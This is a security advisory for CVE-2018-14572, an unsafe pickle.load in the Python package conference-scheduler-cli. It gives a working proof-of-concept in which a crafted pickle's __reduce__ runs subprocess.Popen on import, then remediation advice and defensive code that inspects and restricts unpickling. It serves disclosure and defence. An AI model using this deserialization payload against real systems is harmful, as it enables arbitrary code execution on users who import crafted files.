CVE-2018-14572: Vulnerability in Conference-scheduler-cli

Python Package: conference-scheduler-cli

Version: <= 0.10.1

Published: 24 Jul 2018

Reported by: Joel

CVE ID: CVE-2018-14572 (CVE details)

Overview

In conference-scheduler-cli, a pickle.load call on imported data allows remote attackers to execute arbitrary code via a crafted .pickle file, as demonstrated by Python code that contains an os.system call.

POC

from scheduler import io
import os
from pathlib import Path
import pickle

# pickle calls __reduce__ when serialising; the returned (callable, args)
# pair is invoked by pickle.load when the file is imported.
class joel_test(object):
    def __reduce__(self):
        import subprocess
        return (subprocess.Popen, ('calc.exe',))

test = joel_test()
f = open('solution\\scheduler.pickle', 'wb')
pickle.dump(test, f)
f.close()

# The vulnerable importer unpickles solution/scheduler.pickle, triggering the call.
io.import_schedule_definition(Path(Path.cwd(), 'solution'))

Remediation

The importer should use yaml.safe_load to parse the YAML file instead of calling pickle.load on data it does not control.
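As an added illustration of the bug class (not code from conference-scheduler-cli), the following shows how a loader can detect and refuse pickles that import or call anything, using only the standard library. The function and class names are assumptions, and the sample pickles are constructed inline; the "malicious" one is built the same way as the PoC above but reduces to the harmless builtin len() so it stays inert.

```python
import io
import pickle
import pickletools

# Opcodes that let a pickle stream resolve a global name or invoke a callable
# during load. Plain data (dicts, lists, strings, numbers) never needs them.
CODE_EXEC_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def inspect_pickle(data: bytes) -> list:
    """Return the code-execution-capable opcodes found in a pickle stream.
    pickletools.genops only disassembles, so nothing is executed here."""
    return [op.name for op, _arg, _pos in pickletools.genops(data) if op.name in CODE_EXEC_OPCODES]


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup, so a __reduce__ payload
    such as the PoC's subprocess.Popen can never be resolved."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden in schedule data")


def safe_load_schedule(data: bytes):
    """Hypothetical hardened importer: static opcode check, then restricted load."""
    found = inspect_pickle(data)
    if found:
        raise pickle.UnpicklingError(f"refusing pickle with opcodes {sorted(set(found))}")
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Constructed sample: a benign schedule-like structure ...
BENIGN = pickle.dumps({"talks": ["Keynote", "Lightning talks"], "slots": [0, 1]})


# ... and an object pickled the way the PoC does, reducing to a harmless
# callable (len) instead of a process launch.
class ReduceToCall:
    def __reduce__(self):
        return (len, ("x",))


MALICIOUS = pickle.dumps(ReduceToCall())
```

Running `inspect_pickle(MALICIOUS)` reports the STACK_GLOBAL/GLOBAL and REDUCE opcodes, while `safe_load_schedule(BENIGN)` returns the dict unchanged.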